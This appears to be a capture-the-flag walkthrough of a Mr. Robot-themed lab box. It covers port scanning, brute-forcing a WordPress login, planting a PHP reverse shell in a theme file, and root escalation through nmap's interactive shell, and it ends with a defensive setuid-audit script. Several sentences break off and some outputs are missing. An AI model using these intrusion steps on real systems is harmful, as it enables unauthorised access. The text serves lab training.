Have you seen the hacker-themed TV show Mr. Robot?
The challenge involves standard pen-testing tools such as nmap for enumeration and gobuster for directory brute-forcing. We will also exploit a certain /bin command's ability to run as root in order to retrieve the last flag.
First, we connect to the VPN with OpenVPN, start up our target machine, and then note down our IPs:
export myIP=10.6.2.23
export targetIP=10.10.58.206
Let's start scanning the target machine with:
sudo nmap -Pn -sC -p- -O $targetIP
-Pn skips host discovery
-sC runs the default scripts
-p- scans all ports
-O enables OS detection
Here’s the output:
┌──(tester㉿box)-[~]
└─$ sudo nmap -Pn -sC -p- -O $targetIP
[sudo] password for tester:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 12:16 EST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.58% done; ETC: 12:20 (0:03:52 remaining)
Stats: 0:13:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.25% done; ETC: 12:30 (0:01:27 remaining)
Stats: 0:13:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 91.88% done; ETC: 12:30 (0:01:13 remaining)
Nmap scan report for 10.10.15.66
Host is up (0.081s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
|_http-title: Site doesn't have a title (text/html).
443/tcp open   https
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose|specialized|storage-misc|WAP|broadband router|printer
Running (JUST GUESSING): Linux 3.X|5.X|4.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5.4 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 5.4 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 942.40 seconds
For further enumeration, let's grab SecLists (a set of standard scanning wordlists) from the git repo at https://github.com/danielmiessler/SecLists.git. Next, we'll run gobuster with big.txt as our wordlist:
sudo gobuster dir -w /home/tester/hacking-tools/SecLists/Discovery/Web-Content/big.txt -u http://10.10.15.66
The most interesting pages that jump out at me are robots.txt and /wp-admin. Let's look at both of them to see what additional hints we can find.
At /wp-admin we discover (no surprise!) a WordPress login page. At $targetIP/robots.txt we find:
User-agent: *
fsocity.dic
Key-1-of-3.txt
Locating The First Key
If we navigate in our browser to $targetIP/fsocity.dic we download a dictionary file, fsocity.dic. Browsing through the dictionary, we notice that it appears to be a password wordlist.
$targetIP/key-1-of-3.txt reveals our first of three keys:
Determining The Username
Now that we have a login page to WordPress and a password wordlist (fsocity.dic), all we need is a login username, and we will be ready to use gobuster to brute-force our way into the admin dashboard.
After inspecting the login page, we guess a few names from the Mr. Robot show: Elliot, Mr. Robot, Tyrell.
The errors from the login page reveal that Elliot is a valid username, but Mr. Robot and Tyrell are not. To test this out, we can also try misspelling Elliott (with two t’s) with a random password to see that the error returned says:
Brute-Forcing The Password To WordPress Admin Dashboard
For this next attack we will use a specialized WordPress scanning tool:
wpscan --url 10.10.58.206 -P /home/tester/Downloads/fsocity.dic --usernames elliot
-P specifies the password list
The scan successfully found Elliot's password!
successfully found Elliot's password: ER28-0652
Uploading a Malicious Payload
After logging in to WordPress at $targetIP/wp-login.php we find a dashboard. Clicking on Appearance/editor in the left sidebar shows us a list of pages we can modify. Let's modify the 404.php error page to upload a malicious payload.
Spawning a Reverse Shell From WordPress
For our malicious payload, we will use pentest monkey's PHP revshell from GitHub. The only thing we need to modify on the payload is our attack machine's IP and listening port. After updating the payload, we can save it in the
Now, to spawn a shell to a listener, all we need to do is load up the $targetIP/404.php page from our browser.
Let's set up a listener with:
sudo nc -lvnp 53
-l = listen mode, for inbound connects
-n = suppress name/port resolution
We used port 53 for our listener port in this example.
Success! We just caught the reverse shell with netcat. It is an unstable shell, so we can do a few things to stabilize it. We can start by spawning a proper shell with Python:
python -c 'import pty;pty.spawn("/bin/bash");'
After backgrounding the shell with Ctrl+Z, we enter the command:
stty raw -echo; fg
This command mirrors our terminal settings from the local machine to the netcat listener shell. It also gives us abilities such as tab completion and the up arrow for the most recent commands. The fg at the end of this command foregrounds the
And now, when we load the
404.php webpage, we successfully catch the revshell!
Cracking User Robot's Password
Found it! Now, all we need to do is look this hash up on a website that hosts dictionaries of cracked hashes, or crack it on our attack machine with a cracking program. Using crackstation, we can find the cleartext of our password!
Finding The Second Key
After switching over to user robot with our cracked password, we do a bit of enumeration and easily find the key.
su robot
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Privilege Escalation to Root
With the following command, we search for files in /bin/ that have the setuid bit set. In other words, these files run with the privileges of their owner, so a root-owned setuid binary can run as root from a non-root account. GTFOBins has a comprehensive list of binaries whose features can be leveraged to carry out privilege escalation.
For this box, we will find out that there are several options with the command:
find / -perm +6000 2>/dev/null | grep '/bin/'
We will move forward with Nmap. It has the ability to go into an interactive mode where it can send and receive commands as the root user.
We start nmap in interactive mode with the command:
Then adding the prefix ! allows us to issue commands with root privileges. After locating the file for key 3, we can cat it out, using ; to chain commands together.
nmap> !cd /root;cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
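From the defender's side, the setuid audit above is the same check an administrator should run routinely: list every setuid/setgid file, flag the ones GTFOBins documents as able to spawn a shell (nmap's interactive mode is the case on this box), and diff the result against a recorded baseline. The following is an added example written for this write-up, not code from the original post or from any tool it mentions; RISKY_BASENAMES is an illustrative subset (an assumption), and make_demo_tree builds a constructed sample tree rather than scanning a real system.

```python
import os
import stat
import tempfile

# Illustrative subset of binaries GTFOBins documents as able to spawn a shell
# when setuid/setgid (assumption: extend this from your own baseline review).
RISKY_BASENAMES = {"nmap", "find", "vim", "python", "bash", "less", "cp"}


def find_setid_files(root):
    """Regular files under `root` with the setuid or setgid bit set.
    Same idea as the walkthrough's `find / -perm +6000`, minus the grep."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; keep scanning
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def risky_setid_files(root, risky=RISKY_BASENAMES):
    """Setid files whose basename is on the shell-escape list: investigate first."""
    return [p for p in find_setid_files(root) if os.path.basename(p) in risky]


def new_since_baseline(current, baseline):
    """Setid files not present in an earlier recorded baseline list."""
    return sorted(set(current) - set(baseline))


def make_demo_tree():
    """Constructed sample tree (not a real system): a fake bin/ holding a
    setuid nmap, a setuid ping and a plain ls. Returns the tree root."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    for name, mode in (("nmap", 0o4755), ("ping", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)  # set the bit after writing so it is not cleared
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    print("setid files:", find_setid_files(demo))
    print("shell-escape candidates:", risky_setid_files(demo))
```

Running it against / on a real host (as root, so every directory is readable) and storing the output as the baseline turns the walkthrough's enumeration step into a periodic drift check.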
And now we have retrieved all 3 of Mr. Robot’s keys.